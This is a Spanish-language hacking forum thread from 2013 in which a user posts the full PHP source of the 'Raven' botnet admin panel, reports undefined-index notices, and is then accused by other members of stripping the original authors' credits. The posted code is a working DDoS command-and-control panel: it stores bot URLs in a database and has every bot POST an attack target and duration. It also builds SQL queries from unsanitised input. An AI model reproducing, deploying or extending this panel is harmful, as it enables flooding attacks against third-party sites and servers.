Botnet Raven error!

Iniciado por PW[N]ED, Julio 01, 2013, 02:23:52 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 01, 2013, 02:23:52 PM Ultima modificación: Febrero 09, 2014, 11:00:55 AM por Expermicid
Miren este lindo error que encontre en la botnet raven de undercode ;

Código: php
Notice: Undefined index: target in /opt/lampp/htdocs/Raven/admin.php on line 10

Notice: Undefined index: time in /opt/lampp/htdocs/Raven/admin.php on line 11

Notice: Undefined index: bot in /opt/lampp/htdocs/Raven/admin.php on line 12


y las lineas son estas

Código: php
    $obj=$_POST['target'];
    $tiempo=$_POST['time'];
    $bot=htmlentities($_POST['bot'], ENT_QUOTES);



el codigo entero es este


Código: php
<? 
session_start();

if ($_SESSION['estado']!="log") {
    echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=index.php">';
}
else {

//insert bot
    $obj=$_POST['target'];
    $tiempo=$_POST['time'];
    $bot=htmlentities($_POST['bot'], ENT_QUOTES);
    


    include('config.php');
    $exts=explode(".", $bot);
    $exts2=end($exts);
    if(isset($_POST['add'])) {
        //control ext
        if(!filter_var($bot, FILTER_VALIDATE_URL)){
            echo "<script>alert('Ingrese una url valida!'); </script>";
        }
        
        elseif($exts2!="php"){
            echo "<script>alert('No se encontro un script valido en la url!'); </script>";
       }
    //
        else{
            $bot2=str_ireplace("http://", "", $bot);
            $bot3=explode("/", $bot2);
            $corta=explode("/", $bot2);
            unset($corta[0]);
            $path=implode("/", $corta);
            $ip=gethostbyname($bot3[0]);
            $flag=file_get_contents("http://geoip.wtanaka.com/cc/".$ip);
            $insert="INSERT INTO bots (ip, host, path, location) VALUES('$ip', '$bot3[0]', '$path', '$flag');";
            $cons=mysqli_query($conexion, $insert);
}
    }
//attack
//coneccion bot
//cabeceras http
    $encod="target=".$obj."&time=".$tiempo."&start=Attack%21";
    $long=strlen($encod);
    if(isset($_POST['start'])) {
        $consulta="SELECT host,path FROM bots;";
        $consulta2=mysqli_query($conexion, $consulta);
        while($data=mysqli_fetch_array($consulta2, MYSQLI_ASSOC)){
            $socket=fsockopen($data['host'], 80);
            fputs($socket, "POST /".$data['path']." HTTP/1.0\r\n");
            fputs($socket, "Host: ".$data['host']."\r\n");
            fputs($socket, "Content-Type: application/x-www-form-urlencoded\r\n");
            fputs($socket, "Content-Length:". $long."\r\n\r\n");
            fputs($socket, $encod);
            fclose($socket);
     
}
}
//bots count
    $num="SELECT * FROM bots;";
    $num1=mysqli_query($conexion, $num);

      echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//ES" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">

    
    <head>
       <meta charset="UTF-8">
       <meta name="author" content="[Q]3rV[0]" />
       <meta name="language" content="spanish" />  
       <meta http-equiv="Content-Type" content="text/html" />
       <title>PW[N]ED Botnet v1.0 | ForoMalware</title>
       
       <link rel="icon" href="img/favicon.ico" type="image/x-icon" />       
       
       <link type="text/css" rel="stylesheet" href="css/raven.css" /> 
       
       <script type="text/javascript" src="js/jquery-1.3.2.min.js"></script>
       <script type="text/javascript" src="js/jquery.easing.1.2.js"></script>
       <script type="text/javascript" src="js/jquery.prettyPhoto.js"></script>
       <script type="text/javascript" src="js/cufon-yui.js"></script>
       <script type="text/javascript" src="js/Sansation_700.font.js"></script>  
       <script type="text/javascript" src="js/Sansation_400.font.js"></script>     
       <script type="text/javascript" src="js/Sansation_300.font.js"></script>   
       <script type="text/javascript" src="js/common.js"></script>
       <script type="text/javascript" src="js/raven.js"></script>'; ?>
       
   
        <script type="text/javascript" src="lib/DD_belatedPNG_0.0.8a-min.js"></script>
        <script>
          DD_belatedPNG.fix(".ie6PNGfix , .commonLink");
          
          /* string argument can be any CSS selector */
          /* .ie6PNGfix example is unnecessary */
          /* change it to what suits you! */
        </script>
   

                
    <?php echo '</head>
    
    <body>
      
      <div id="headerContainer">
        <a name="pageTopAnchor"></a>
        <a href="index.php" id="logo" class="ie6PNGfix"></a>
        <div id="titleWrapper">                              
          <a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
          <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p> 
        </div> 
               
        </div> 
 
        <div id="bodyContainer2">    
          <div id="navigationContainer">            
            <ul class="rootnav">
                <li><a href="logout.php">logout</a></li>
            </ul>
          </div>
             
          <div id="servicesContentContainer">           
            <div id="servicesContainer">
            <div id="servicesBigInfo">
            <br />
              <form action="#" method="POST">
                <center>
                  <h3 id="servicesProductsHeader">Add Bot <img src=img/add.png height=40 weight=40></h3><br />        
                  Raven URL: <input class="url" name="bot" value="" type="text" />
                  <br /><br />
                  <input type="submit" class="btn" name="add" value="Add Bot"> 
                  <br />
                </center>
              </form>
                <center> 
              <a href=bots.php target="blank">Bots: '.mysqli_num_rows($num1).'</a>
                
              <hr><br />

              <div class="item"></div>

              <h3 id="servicesProductsHeader">Attack <img src=img/attack.png height=40 weight=40></h3><br />
              
              <form action="#" method="POST"> 
                Target URL/IP: <input class="url" name="target" value="" /> Time: <input class="url2" name="time" value="" /> 
                <br /><br />
                <input type="submit" class="btn" name="start" value="Attack!">
              </form>
              </center>
                
                                                                  
            </div>                                                                                                                     
          </div>                          
        </div> 
        <div class="clearBoth"></div>                      
      </div> 
      <br />
    </body>
</html>';
}
?>
Julio 16, 2013, 03:57:48 PM #1
No la he probado, asique no se como es, pero has ingresado correctamente todos los campos? has revisado que el resto de las cosas funcionen? puede ser que el hosting haya quitado alguna función y por eso se produce el error.

Subelo a otro host, lo pruebas y si te sigue dando el mismo error, me avisas, lo descargo lo testeo y te digo :)

Un saludo.


Julio 16, 2013, 05:49:24 PM #2 Ultima modificación: Julio 16, 2013, 05:54:47 PM por arthusu
ahi deberia aver un isset en el envio de esta manera no sale ese error, es decir si se envia el formulario, entonces esas variables si existen sino no existen :P

Código: php
 <div id="titleWrapper">                              
         <a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
         <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
       </div>



WTF?

salu2

Pentest - Hacking & Security Services

Contact me: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Julio 16, 2013, 08:27:56 PM #3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
ahi deberia aver un isset en el envio de esta manera no sale ese error, es decir si se envia el formulario, entonces esas variables si existen sino no existen :P

Código: php
 <div id="titleWrapper">                              
         <a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
         <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>
       </div>



WTF?

salu2

Ningun WTF!! Claro como el agua un C&P  :D
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!


Julio 16, 2013, 08:43:52 PM #4
Ripper detected :3
El conocimiento es libre...
La información no lo es xD
Julio 17, 2013, 09:15:25 AM #5
Código: html5
<a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
<p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>


Se agradece el reporte del bug, pero ni siquiera entras en la categoria de script kiddie... es LAMMERtable tu actitud de modificar el codigo fuente y ponerle tus creditos... asi es como agradeces el trabajo de Cuervo y de todo underc0de que se esforzo y le dedico tiempo al proyecto?

Julio 17, 2013, 09:26:43 AM #6
Código: php
<a href="index.php" id="title">ForoMalware - PW[N]ED BotNet</a>
         <p class="titleSlogan">PW[N]ED BotNet - Powered by PW[N]ED</p>


Si se supone que la hiciste tu deberías saber arreglar el bug...
Twitter: @The_Pr0ph3t
[email protected]
Julio 17, 2013, 10:00:09 AM #7
Pues si, un tanto lamentable...
Julio 17, 2013, 10:58:27 AM #8
FAIL.

Desde luego que eso que has hecho esta muy mal.
Julio 17, 2013, 11:09:19 AM #9
Esto se desvió del post original, una lastima la actitud del usuario.
TEMA CERRADO.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario